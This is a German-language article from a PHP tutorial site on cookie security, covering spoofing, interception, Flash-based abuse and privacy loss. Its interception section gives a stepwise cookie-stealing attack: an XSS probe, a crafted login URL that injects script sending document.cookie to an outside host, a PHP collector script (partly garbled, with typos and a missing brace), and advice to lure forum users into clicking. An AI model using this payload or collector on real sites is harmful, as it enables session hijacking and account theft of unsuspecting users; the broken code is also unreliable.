Heim  >  Artikel  >  Web-Frontend  >  Eingehende Analyse von Cookie-Sicherheitsproblemen_Cookies

Eingehende Analyse von Cookie-Sicherheitsproblemen_Cookies

WBOY
WBOYOriginal
2016-05-16 16:12:071675Durchsuche

Der Zweck von Cookies besteht darin, den Benutzern Komfort zu bieten und einen Mehrwert für die Website zu schaffen. Unter normalen Umständen stellen sie keine ernsthaften Sicherheitsrisiken dar. Cookie-Dateien können nicht als Code ausgeführt werden und keine Viren übertragen. Sie sind Eigentum des Benutzers und können nur von dem Server gelesen werden, der sie erstellt hat. Darüber hinaus erlauben Browser im Allgemeinen nur das Speichern von 300 Cookies und jede Website kann bis zu 20 Cookies speichern. Die Größe jedes Cookies ist auf 4 KB begrenzt. Daher füllen Cookies nicht die Festplatte und werden nicht als solche verwendet ein „Denial of Service“-Angriff.

Anstelle der Benutzeridentität bestimmt jedoch manchmal die Sicherheit von Cookies die Sicherheit des gesamten Systems, und die Sicherheitsprobleme von Cookies können nicht ignoriert werden.

(1) Cookie-Spoofing Cookies erfassen Informationen wie Benutzerkonto-IDs und Passwörter und werden in der Regel mit der MD5-Methode verschlüsselt, bevor sie online übertragen werden. Selbst wenn die verschlüsselten Informationen von einigen Personen mit Hintergedanken im Internet abgefangen werden, können sie nicht verstanden werden. Das Problem besteht nun jedoch darin, dass die Person, die das Cookie abfängt, die Bedeutung dieser Zeichenfolgen nicht kennen muss. Solange sie die Cookies anderer Personen an den Server übermittelt und die Überprüfung bestehen kann, kann sie sich als Opfer ausgeben und sich anmelden Dieses Verhalten nennt man Cookies-Cheat.
Illegale Benutzer erhalten durch Cookie-Täuschung entsprechende Verschlüsselungsschlüssel und greifen so auf alle personalisierten Informationen legitimer Benutzer zu, einschließlich der E-Mails der Benutzer und sogar Kontoinformationen, was zu schwerem Schaden an persönlichen Daten führt.
(2) Cookie-Abfangen
Cookies werden in Form von Klartext zwischen dem Browser und dem Server übertragen und können leicht von anderen illegal abgefangen und verwendet werden. Cookies können von jedem gelesen werden, der Webkommunikation abfangen kann.
Nachdem ein Cookie von einem illegalen Benutzer abgefangen und dann innerhalb seiner Gültigkeitsdauer abgespielt wurde, genießt der illegale Benutzer die Rechte eines legalen Benutzers. Beim Online-Lesen können beispielsweise illegale Benutzer elektronische Zeitschriften online lesen, ohne dafür Gebühren zu zahlen.

Cookie-Abfangmethoden umfassen Folgendes:

(1) Verwenden Sie Programmierung, um Cookies abzufangen. Die Methode wird im Folgenden analysiert. Die Methode wird in zwei Schritten durchgeführt.

Schritt 1: Suchen Sie die Website, die Cookies sammeln muss, analysieren Sie sie und erstellen Sie die URL. Öffnen Sie zunächst die Website, auf der Sie Cookies sammeln möchten. Melden Sie sich auf der Website an und geben Sie den Benutzernamen „“ ein und erfassen Sie die Pakete und erhalten Sie den folgenden Code:
http://www.XXX.net/tXl/login/login.pl? Benutzername=&passwd=&ok.X=28&ok.y=6;
Ersetzen Sie „“ durch:
„<script>alert(document.cookie)</script>“ Wenn die Ausführung erfolgreich ist, beginnen Sie mit der Erstellung der URL:
http://www.XXX.net/tXl/login/login.pl? username=<script>window.open ("http://www.cbifamily.org/cbi.php?"+document.cookie)</script>&passwd=&ok.X=28&ok.y=6.
Unter anderem ist http://www.cbifamily.org/cbi.php ein Skript auf einem bestimmten Host, das der Benutzer steuern kann. Beachten Sie, dass „+“ die URL-Kodierung des Symbols „ “ ist, da „ “ als Leerzeichen behandelt wird. Die URL kann im Forum gepostet werden, um andere zum Klicken zu bewegen.

Schritt 2: Bereiten Sie ein PHP-Skript vor, das Cookies sammelt, und platzieren Sie es auf einer Website, die der Benutzer kontrollieren kann. Wenn eine ahnungslose Person auf die erstellte URL klickt, kann der PHP-Code ausgeführt werden. Der spezifische Inhalt des Skripts lautet wie folgt:

Code kopieren Der Code lautet wie folgt:

$info=getenv("OUERY_STRING");
if($info){
$fp=fopen("info.tXt","a"); fwrite($fp,!info."n"); fclose($fp);

header("Location:http://www.XXX.net");
?>

Stellen Sie diesen Code ins Netzwerk und Sie können die Cookies aller sammeln. Wenn ein Forum HTML-Code oder die Verwendung von Flash-Tags zulässt, können Sie mithilfe dieser Technologien Cookie-Code sammeln und in das Forum einfügen, dem Beitrag dann ein attraktives Thema geben und interessante Inhalte schreiben, und Sie können schnell eine große Anzahl sammeln von Cookies. Im Forum wurden die Passwörter vieler Leute auf diese Weise gestohlen.
(2) Nutzen Sie die verborgenen Gefahren von Flash-Code, um Cookies abzufangen. In Flash gibt es eine getURL()-Funktion. Flash kann diese Funktion nutzen, um automatisch eine bestimmte Webseite zu öffnen, wodurch Benutzer möglicherweise auf eine Website mit Schadcode weitergeleitet werden. Wenn ein Benutzer beispielsweise eine Flash-Animation auf einem Computer genießt, hat sich der Code im Animationsrahmen möglicherweise stillschweigend mit dem Internet verbunden und eine sehr kleine Seite mit speziellem Code geöffnet. Diese Seite kann Cookies sammeln und andere schädliche Dinge tun. Dinge. Websites können dies nicht verhindern, da Flash eine interne Funktion der Flash-Datei ist.
(3) Cookies gefährden die Privatsphäre im Netzwerk
Der Hauptgrund, warum Cookies zu Datenschutzverlusten im Internet führen, ist: Sie werden durch kommerzielle Interessen getrieben. Mit dem Aufstieg des E-Commerce und der Entstehung enormer Geschäftsmöglichkeiten im Internet missbrauchen einige Websites und Institutionen Cookies und nutzen Suchmaschinentechnologie, Data-Mining-Technologie und sogar Netzwerktäuschungstechnologie, um ohne die Erlaubnis des Besuchers persönliche Daten anderer Personen zu sammeln um Benutzerdatenbanken, Werbung und andere gewinnbringende Zwecke aufzubauen, was zu einem Verlust der Privatsphäre der Benutzer führt. „Die Offenheit der Übertragung von Cookie-Informationen. Cookie-Dateien verfügen über spezielle Übertragungsverfahren und Texteigenschaften. Die Übertragung unsicher verschlüsselter Cookie-Dateien zwischen dem Server und dem Client kann leicht zum Verlust persönlicher Informationen führen.

Das Obige ist mein persönliches Verständnis der Cookie-Sicherheit. Bitte korrigieren Sie mich, wenn es Auslassungen gibt.

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn